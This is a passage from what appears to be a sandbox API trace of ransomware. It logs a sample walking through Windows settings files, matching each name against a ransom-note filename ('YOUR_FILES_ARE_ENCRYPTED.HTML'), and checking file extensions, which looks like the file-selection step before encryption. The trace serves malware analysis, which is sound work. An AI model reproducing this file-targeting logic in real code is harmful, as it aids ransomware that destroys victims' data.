hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x131531fb, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x131531fb, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23a9aeb1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e7, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Input_Touch_CursorSpeed.settingcontent-ms", cAlternateFileName="AAE56F~1.SET")) returned 1 [0121.636] StrStrIW (lpFirst="AAA_SystemSettings_Input_Touch_CursorSpeed.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.636] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_CursorSpeed.settingcontent-ms") returned 187 [0121.636] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Touch_CursorSpeed.settingcontent-ms") returned=".settingcontent-ms" [0121.636] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.636] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Touch_CursorSpeed.settingcontent-ms") returned=".settingcontent-ms" [0121.636] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13238029, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x13238029, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x505, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Input_Touch_EnableEdgeGesture.settingcontent-ms", cAlternateFileName="AA140C~1.SET")) returned 1 [0121.636] StrStrIW (lpFirst="AAA_SystemSettings_Input_Touch_EnableEdgeGesture.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.636] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_EnableEdgeGesture.settingcontent-ms") returned 193 [0121.636] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Touch_EnableEdgeGesture.settingcontent-ms") returned=".settingcontent-ms" [0121.636] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.636] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Touch_EnableEdgeGesture.settingcontent-ms") returned=".settingcontent-ms" [0121.636] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1331ced9, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1331ced9, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x238d127e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4f6, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Input_Touch_EnableTouchPad.settingcontent-ms", cAlternateFileName="AA1803~1.SET")) returned 1 [0121.637] StrStrIW (lpFirst="AAA_SystemSettings_Input_Touch_EnableTouchPad.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.637] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_EnableTouchPad.settingcontent-ms") returned 190 [0121.637] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Touch_EnableTouchPad.settingcontent-ms") returned=".settingcontent-ms" [0121.637] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.637] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Touch_EnableTouchPad.settingcontent-ms") returned=".settingcontent-ms" [0121.637] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1344e05e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1344e05e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x238d127e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x512, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Input_Touch_EnableVisualFeedback.settingcontent-ms", cAlternateFileName="AA4060~1.SET")) returned 1 [0121.637] StrStrIW (lpFirst="AAA_SystemSettings_Input_Touch_EnableVisualFeedback.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.637] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_EnableVisualFeedback.settingcontent-ms") returned 196 [0121.637] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Touch_EnableVisualFeedback.settingcontent-ms") returned=".settingcontent-ms" [0121.637] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.637] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Touch_EnableVisualFeedback.settingcontent-ms") returned=".settingcontent-ms" [0121.637] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13fed879, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x13fed879, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23a74c5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x51c, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Input_Touch_EnableVisualFeedbackPM.settingcontent-ms", cAlternateFileName="AA50D8~1.SET")) returned 1 [0121.637] StrStrIW (lpFirst="AAA_SystemSettings_Input_Touch_EnableVisualFeedbackPM.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.637] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_EnableVisualFeedbackPM.settingcontent-ms") returned 198 [0121.637] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Touch_EnableVisualFeedbackPM.settingcontent-ms") returned=".settingcontent-ms" [0121.637] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.637] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Touch_EnableVisualFeedbackPM.settingcontent-ms") returned=".settingcontent-ms" [0121.637] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14203966, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x14203966, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23a287a5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x514, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Input_Touch_FourFingerTapEnabled.settingcontent-ms", cAlternateFileName="AABF11~1.SET")) returned 1 [0121.637] StrStrIW (lpFirst="AAA_SystemSettings_Input_Touch_FourFingerTapEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.637] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_FourFingerTapEnabled.settingcontent-ms") returned 196 [0121.637] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Touch_FourFingerTapEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.637] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.637] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Touch_FourFingerTapEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.637] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x177ce9db, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x177ce9db, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2339a047, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x500, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Input_Touch_LeaveOnWithMouse.settingcontent-ms", cAlternateFileName="AA5689~1.SET")) returned 1 [0121.637] StrStrIW (lpFirst="AAA_SystemSettings_Input_Touch_LeaveOnWithMouse.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.637] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_LeaveOnWithMouse.settingcontent-ms") returned 192 [0121.637] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Touch_LeaveOnWithMouse.settingcontent-ms") returned=".settingcontent-ms" [0121.637] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.637] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Touch_LeaveOnWithMouse.settingcontent-ms") returned=".settingcontent-ms" [0121.637] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17cdfb15, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x17cdfb15, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x233e650b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e2, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Input_Touch_PanEnabled.settingcontent-ms", cAlternateFileName="AA25A5~1.SET")) returned 1 [0121.637] StrStrIW (lpFirst="AAA_SystemSettings_Input_Touch_PanEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.637] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_PanEnabled.settingcontent-ms") returned 186 [0121.637] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Touch_PanEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.638] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.638] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Touch_PanEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.638] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19064db7, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x19064db7, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x519, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Input_Touch_RightClickZoneEnabled.settingcontent-ms", cAlternateFileName="AAA6F5~1.SET")) returned 1 [0121.638] StrStrIW (lpFirst="AAA_SystemSettings_Input_Touch_RightClickZoneEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.638] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_RightClickZoneEnabled.settingcontent-ms") returned 197 [0121.638] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Touch_RightClickZoneEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.638] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.638] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Touch_RightClickZoneEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.638] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e7b71d7, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1e7b71d7, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x238f74d9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x514, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Input_Touch_SetActivationTimeout.settingcontent-ms", cAlternateFileName="AA4412~1.SET")) returned 1 [0121.638] StrStrIW (lpFirst="AAA_SystemSettings_Input_Touch_SetActivationTimeout.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.638] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_SetActivationTimeout.settingcontent-ms") returned 196 [0121.638] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Touch_SetActivationTimeout.settingcontent-ms") returned=".settingcontent-ms" [0121.638] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.638] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Touch_SetActivationTimeout.settingcontent-ms") returned=".settingcontent-ms" [0121.638] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f710191, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1f710191, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x238d127e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x50a, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Input_Touch_SetScrollDirection.settingcontent-ms", cAlternateFileName="AA99A4~1.SET")) returned 1 [0121.638] StrStrIW (lpFirst="AAA_SystemSettings_Input_Touch_SetScrollDirection.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.638] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_SetScrollDirection.settingcontent-ms") returned 194 [0121.638] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Touch_SetScrollDirection.settingcontent-ms") returned=".settingcontent-ms" [0121.638] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.638] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Touch_SetScrollDirection.settingcontent-ms") returned=".settingcontent-ms" [0121.638] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ff4233e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1ff4233e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x239dc2f0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e2, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Input_Touch_TapAndDrag.settingcontent-ms", cAlternateFileName="AAE53C~1.SET")) returned 1 [0121.638] StrStrIW (lpFirst="AAA_SystemSettings_Input_Touch_TapAndDrag.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.638] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_TapAndDrag.settingcontent-ms") returned 186 [0121.638] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Touch_TapAndDrag.settingcontent-ms") returned=".settingcontent-ms" [0121.638] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.638] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Touch_TapAndDrag.settingcontent-ms") returned=".settingcontent-ms" [0121.638] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x224a91ec, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x224a91ec, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23458c07, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e7, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Input_Touch_TapsEnabled.settingcontent-ms", cAlternateFileName="AA27D0~1.SET")) returned 1 [0121.638] StrStrIW (lpFirst="AAA_SystemSettings_Input_Touch_TapsEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.638] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_TapsEnabled.settingcontent-ms") returned 187 [0121.638] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Touch_TapsEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.638] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.638] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Touch_TapsEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.638] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22a78c0e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x22a78c0e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2340c766, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x523, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Input_Touch_ThreeFingerSlideEnabled.settingcontent-ms", cAlternateFileName="AAA960~1.SET")) returned 1 [0121.638] StrStrIW (lpFirst="AAA_SystemSettings_Input_Touch_ThreeFingerSlideEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.638] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_ThreeFingerSlideEnabled.settingcontent-ms") returned 199 [0121.639] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Touch_ThreeFingerSlideEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.639] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.639] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Touch_ThreeFingerSlideEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.639] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22c68f16, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x22c68f16, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23458c07, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x519, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Input_Touch_ThreeFingerTapEnabled.settingcontent-ms", cAlternateFileName="AA2D71~1.SET")) returned 1 [0121.639] StrStrIW (lpFirst="AAA_SystemSettings_Input_Touch_ThreeFingerTapEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.639] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_ThreeFingerTapEnabled.settingcontent-ms") returned 197 [0121.639] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Touch_ThreeFingerTapEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.639] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.639] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Touch_ThreeFingerTapEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.639] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22e58c4a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x22e58c4a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x239b6099, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x50f, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Input_Touch_TwoFingerTapEnabled.settingcontent-ms", cAlternateFileName="AA729F~1.SET")) returned 1 [0121.639] StrStrIW (lpFirst="AAA_SystemSettings_Input_Touch_TwoFingerTapEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.639] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_TwoFingerTapEnabled.settingcontent-ms") returned 195 [0121.639] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Touch_TwoFingerTapEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.639] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.639] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Touch_TwoFingerTapEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.639] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2312d9e6, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2312d9e6, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x234329b1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e7, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Input_Touch_ZoomEnabled.settingcontent-ms", cAlternateFileName="AA9D0C~1.SET")) returned 1 [0121.641] StrStrIW (lpFirst="AAA_SystemSettings_Input_Touch_ZoomEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.641] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_ZoomEnabled.settingcontent-ms") returned 187 [0121.641] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Touch_ZoomEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.641] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.641] PathFindExtensionW (pszPath="AAA_SystemSettings_Input_Touch_ZoomEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.641] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2453a3a4, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2453a3a4, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x239dc2f0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x515, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SystemSettings_Keyboard_IsAutoCorrectionEnabled.settingcontent-ms", cAlternateFileName="AAEFA7~1.SET")) returned 1 [0121.641] StrStrIW (lpFirst="AAA_SystemSettings_Keyboard_IsAutoCorrectionEnabled.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.641] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsAutoCorrectionEnabled.settingcontent-ms") returned 196 [0121.641] PathFindExtensionW (pszPath="AAA_SystemSettings_Keyboard_IsAutoCorrectionEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.641] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.641] PathFindExtensionW (pszPath="AAA_SystemSettings_Keyboard_IsAutoCorrectionEnabled.settingcontent-ms") returned=".settingcontent-ms" [0121.641] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24e5ccc3, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x24e5ccc3, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x239b6099, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x51d, dwReserved0=0x630488, dwReserved1=0x6f80b8, 